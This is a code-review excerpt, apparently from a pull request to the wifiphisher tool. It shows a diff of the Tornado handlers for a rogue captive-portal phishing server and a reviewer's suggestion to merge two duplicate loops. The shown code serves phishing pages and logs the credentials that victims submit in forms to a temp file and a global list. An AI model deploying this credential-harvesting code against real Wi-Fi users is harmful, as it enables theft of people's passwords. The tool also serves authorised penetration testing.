wifiphisher/common/phishinghttp.py

```diff
@@ -15,59 +16,61 @@
 
 class DowngradeToHTTP(tornado.web.RequestHandler):
 
-    def get(self, url):
+    def get(self):
         self.redirect("http://10.0.0.1:8080/")
 
 
-class ShowPhishingPageHandler(tornado.web.RequestHandler):
+class CaptivePortalHandler(tornado.web.RequestHandler):
 
-    def get(self, url):
+    def get(self):
+        client_request = self.request.path[1:]
+        render_file = "index.html"
         try:
-            if "/" in url:
-                self.redirect("/index")
-            self.render("index.html", **template.get_context())
+            if self.request.path == "/":
+                if os.path.exists(template.get_path() + "index.html"):
+                    render_file = "index.html"
+                #else:
+                    #raise exception
+            else:
+                if os.path.exists(template.get_path() + client_request):
+                    render_file = client_request
+                else:
+                    if os.path.exists(template.get_path() + "index.html"):
+                        render_file = "index.html"
+                    #else:
+                        #raise exception
+            self.render(render_file, **template.get_context())
             wifi_webserver_tmp = "/tmp/wifiphisher-webserver.tmp"
             with open(wifi_webserver_tmp, "a+") as log_file:
                 log_file.write('[' + T + '*' + W + '] ' + O + "GET" + W + " request from " + T +
                                self.request.remote_ip + W + " for " + self.request.full_url() +
                                "\n")
-                log_file.close()
         # Ignore weird requests
         except:
             pass
 
-
-class ReceiveCredsHandler(tornado.web.RequestHandler):
-
     def post(self):
-        self.redirect("/loading")
-        wifi_webserver_tmp = "/tmp/wifiphisher-webserver.tmp"
-        with open(wifi_webserver_tmp, "a+") as log_file:
-            log_file.write('[' + T + '*' + W + '] ' + O + "POST " +
-                           T + self.request.remote_ip + " " +
-                           R + repr(self.request.body) +
-                           W + "\n"
-                           )
-            log_file.close()
+        form_data = tornado.escape.url_unescape(self.request.body.split('&'))
+        form_values = []
+        for each_form_data in form_data:
```

Comment:
Notice this code:
```python
1 for input_name,input_value in form_values:
2            with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
3                log_file.write('[' + T + '*' + W + '] ' + O + "POST" + W + " request from " +
4                               T + self.request.remote_ip + W + " " + G + input_name + W +
5                               " : " + R + input_value + W + "\n")
6        global terminate, creds
7        for input_name,input_value in form_values:
8            creds.insert(0, repr(input_name + " = " + input_value))
```

The loops on line 1 and 7 are identical so they can be merged into one loop.